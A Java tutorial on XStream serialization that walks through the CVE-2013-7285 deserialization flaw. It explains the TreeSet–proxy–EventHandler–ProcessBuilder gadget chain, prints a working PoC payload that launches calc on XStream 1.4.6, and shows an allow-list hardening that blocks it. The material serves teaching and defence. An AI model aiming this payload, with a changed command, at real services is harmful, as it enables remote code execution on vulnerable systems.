Introduction
XStream is a library that converts JavaBeans to XML and back again, which greatly simplifies XML handling for developers. The flip side is that the XML decides which classes get instantiated, so untrusted input is a deserialization attack surface; that is the subject of the vulnerability section below.
Adding the dependency
Note that 1.4.6 is deliberately an old, vulnerable release so that the PoC below works; do not use it in real projects.
```xml
<dependency>
    <groupId>com.thoughtworks.xstream</groupId>
    <artifactId>xstream</artifactId>
    <version>1.4.6</version>
</dependency>
```
Basic usage
Serialization
```java
package com.test.yaml;

import com.thoughtworks.xstream.XStream;

// Person is a plain JavaBean in com.test.yaml with a String name and an int age
// (getters/setters omitted here). XStream uses the fully qualified class name as the root element.
public class XstreamSerialize {
    public static void main(String[] args) {
        XStream xStream = new XStream();
        Person person = new Person();
        person.setName("l2sec");
        person.setAge(10);
        String s = xStream.toXML(person);
        System.out.println(s);
    }
}
```
Deserialization
The element name tells XStream which class to instantiate, and the child elements are written into that object's fields by reflection:
```java
// xStream is the instance created above
String xml = "<com.test.yaml.Person>\n" +
        "  <name>l2sec</name>\n" +
        "  <age>10</age>\n" +
        "</com.test.yaml.Person>";
Person person = (Person) xStream.fromXML(xml);
System.out.println(person.getAge());
```
Vulnerability analysis
CVE-2013-7285
Affected versions
XStream 1.4.x up to and including 1.4.6, and 1.4.10
Description
This is XStream's first CVE and the classic EventHandler gadget chain. The XML describes a `sorted-set` (a `java.util.TreeSet`) holding a string plus a `dynamic-proxy` that implements `java.lang.Comparable` and whose invocation handler is a `java.beans.EventHandler`. When XStream adds the proxy to the TreeSet during unmarshalling, the set has to order it against the existing element, so it calls `compareTo` on the proxy; the proxy forwards that call to `EventHandler.invoke`, which reflectively invokes the configured `action` on the configured `target`. With the target set to a `ProcessBuilder` and the action set to `start`, the command runs. Two details make this work: the chain is triggered by the act of deserializing (no code has to call anything on the result), and XStream's default reflection provider instantiates the `ProcessBuilder` and fills its private `command` field without ever running a constructor.
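To see the chain without XStream in the way, here is the same object graph built in plain Java. This is an added example, not code from the original post: a hypothetical `Sentinel` class that only counts calls is swapped in for `ProcessBuilder` so nothing is executed, but the path TreeSet.add → proxy.compareTo → EventHandler.invoke → target method is exactly the one the XML payload drives.

```java
import java.beans.EventHandler;
import java.util.TreeSet;

public class EventHandlerChainDemo {

    // Hypothetical stand-in for ProcessBuilder: records whether its "action" was invoked.
    public static class Sentinel {
        public int hits;
        public void fire() { hits++; }   // plays the role of ProcessBuilder.start()
    }

    public static void main(String[] args) {
        Sentinel target = new Sentinel();

        // Equivalent of the <dynamic-proxy> element: a Comparable proxy whose
        // InvocationHandler is EventHandler(target, action = "fire").
        Object proxy = EventHandler.create(Comparable.class, target, "fire");

        TreeSet<Object> set = new TreeSet<>();   // <sorted-set>
        set.add("foo");                           // <string>foo</string>: nothing to compare yet

        try {
            // TreeSet has to order the new element against "foo", so it calls
            // proxy.compareTo("foo"). EventHandler.invoke ignores the argument and
            // calls target.fire() with no arguments.
            set.add(proxy);
        } catch (RuntimeException e) {
            // fire() returns void, so the proxy cannot produce the int that compareTo
            // must return and throws (a NullPointerException here; a ClassCastException
            // for ProcessBuilder.start(), which returns a Process). The target method has
            // already run by then, which is why the XStream PoC works even though
            // fromXML itself ends in an exception.
            System.out.println("add() failed with " + e.getClass().getSimpleName()
                    + ", but only after the handler ran");
        }

        System.out.println("target invoked " + target.hits + " time(s)");
    }
}
```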
PoC
```java
package com.test.xstream;

import com.thoughtworks.xstream.XStream;

public class XstreamExploit {
    public static void main(String[] args) {
        XStream xStream = new XStream();
        String xml =
                "<sorted-set>\n" +                                            // java.util.TreeSet
                "    <string>foo</string>\n" +                                // first element, so the next add() must compare
                "    <dynamic-proxy>\n" +                                     // java.lang.reflect.Proxy
                "        <interface>java.lang.Comparable</interface>\n" +
                "        <handler class=\"java.beans.EventHandler\">\n" +     // InvocationHandler
                "            <target class=\"java.lang.ProcessBuilder\">\n" + // instantiated without a constructor
                "                <command>\n" +
                "                    <string>cmd</string>\n" +
                "                    <string>/C</string>\n" +
                "                    <string>calc</string>\n" +
                "                </command>\n" +
                "            </target>\n" +
                "            <action>start</action>\n" +                      // method invoked on the target
                "        </handler>\n" +
                "    </dynamic-proxy>\n" +
                "</sorted-set>";
        // Deserializing is enough: TreeSet.add() -> compareTo() -> EventHandler.invoke() -> ProcessBuilder.start()
        xStream.fromXML(xml);
    }
}
```
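The fix on the consuming side is to stop XStream from instantiating arbitrary classes named in the input. The following is an added example, not code from the original post or from the XStream project: it assumes an XStream release that has the security framework (1.4.7 or later; the methods below do not exist in the 1.4.6 dependency used above) and the `com.test.yaml.Person` bean from the basic-usage section. It clears the default type permissions, re-allows only what a plain bean needs, and then shows that the PoC payload is rejected while legitimate data still round-trips.

```java
package com.test.xstream;

import com.test.yaml.Person;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class XstreamHardened {

    // Builds an XStream instance that unmarshals only the types we expect.
    // Requires XStream >= 1.4.7 (assumed here).
    public static XStream hardened() {
        XStream xStream = new XStream();
        // Drop every default permission: from here on any class that is not
        // explicitly allowed is rejected with ForbiddenClassException.
        xStream.addPermission(NoTypePermission.NONE);
        // Re-allow the building blocks a plain bean needs.
        xStream.addPermission(NullPermission.NULL);
        xStream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xStream.allowTypes(new Class[]{String.class});
        // Allow only our own model package (assumed to be com.test.yaml, as above).
        // TreeSet, Proxy, EventHandler and ProcessBuilder are all outside it.
        xStream.allowTypesByWildcard(new String[]{"com.test.yaml.**"});
        return xStream;
    }

    public static void main(String[] args) {
        XStream xStream = hardened();

        // The CVE-2013-7285 payload from the PoC above, unchanged.
        String payload =
                "<sorted-set>\n" +
                "    <string>foo</string>\n" +
                "    <dynamic-proxy>\n" +
                "        <interface>java.lang.Comparable</interface>\n" +
                "        <handler class=\"java.beans.EventHandler\">\n" +
                "            <target class=\"java.lang.ProcessBuilder\">\n" +
                "                <command>\n" +
                "                    <string>cmd</string>\n" +
                "                    <string>/C</string>\n" +
                "                    <string>calc</string>\n" +
                "                </command>\n" +
                "            </target>\n" +
                "            <action>start</action>\n" +
                "        </handler>\n" +
                "    </dynamic-proxy>\n" +
                "</sorted-set>";

        try {
            xStream.fromXML(payload);
            System.out.println("NOT blocked: payload was deserialized");
        } catch (ForbiddenClassException e) {
            // Expected: the <sorted-set> alias resolves to java.util.TreeSet, which is
            // not on the allow list, so XStream refuses before any proxy, EventHandler
            // or ProcessBuilder is ever built.
            System.out.println("blocked: " + e.getMessage());
        }

        // Legitimate input for the allowed bean still works.
        String good = "<com.test.yaml.Person><name>l2sec</name><age>10</age></com.test.yaml.Person>";
        Person person = (Person) xStream.fromXML(good);
        System.out.println("parsed legitimate bean: " + person.getName() + ", " + person.getAge());
    }
}
```

Prefer this explicit allow list over relying on XStream's built-in deny list: a deny list only covers gadgets that are already known, whereas an allow list limited to your own model package rejects every class an attacker might name, including the ones discovered later.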